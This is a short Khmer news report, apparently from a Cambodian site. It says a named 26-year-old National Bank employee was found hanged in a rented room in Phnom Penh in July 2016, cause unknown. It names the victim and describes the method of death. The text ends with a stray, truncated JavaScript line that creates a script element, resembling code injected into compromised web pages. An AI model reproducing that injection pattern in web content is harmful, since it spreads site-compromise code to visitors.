ប្រទះឃើញសពបុរសម្នាក់ជាបុគ្គលិកធនាគាជាតិស្លាប់ដោយចងក ដោយមិនដឹងមូលហេតុ(video)
ភ្នំពេញ៖ សាកសពបុរសម្នាក់ដែលជាបុគ្គលិកធនាគាជាតិម្នាក់ត្រូវបានគេប្រទះឃើញ ស្លាប់ដោយចងក នៅក្នុងបន្ទប់ជួល បង្កអោយមានការភ្ញាក់ផ្អើលដល់ប្រជាពលរដ្ឋក្បែរខាងនិងសមត្ថកិច្ចមូលដ្ឋានចុះមកត្រួតពិនិត្យ។ ហេតុការណ៍ខាងលើនេះបង្កអោយមានការភ្ញាក់ផ្អើលឡើងកាលពីវេលាម៉ោង៣និង៥០នាទីរសៀលថ្ងៃទី២៨ខែកក្កដា ឆ្នាំ២០១៦លេខ៨Eo ផ្លូវលំ ក្រុម៧ ភូមិទួលសង្កែ សង្កាត់ទួលសង្កែ ខណ្ឌឬស្សីកែវ។
ជនរងគ្រោះដែលចងកស្លាប់នោះឈ្មោះស៊ុន សុខណូ ភេទប្រុស អាយុ២៦ឆ្នាំ មុខរបរធ្វើការនៅធនាគាជាតិ មានស្រុកកំណើតនៅសង្កាត់បឹងកក់២ ខណ្ឌទួលគោក រាជធានីភ្នំពេញ។
តាមប្រភពព៌មានបានអោយដឹងថាជនរងគ្រោះមិនបានចេញទៅធ្វើការរយៈពេល៣ថ្ងៃមកហើយ លុះមកដល់វេលាកើតកើតហេតុខាងលើទើបដឹងថាជនរងគ្រោះបានចងក ស្លាប់ សពមានអាការៈហើមបាត់ទៅហើយដោយមិនដឹងមូលហេតុ។ ដោយ៖ ខេង ប៊ុនធឿន
https://youtu.be/GJyvVF58bqc
var d=document;var s=d.createElement(‘script’);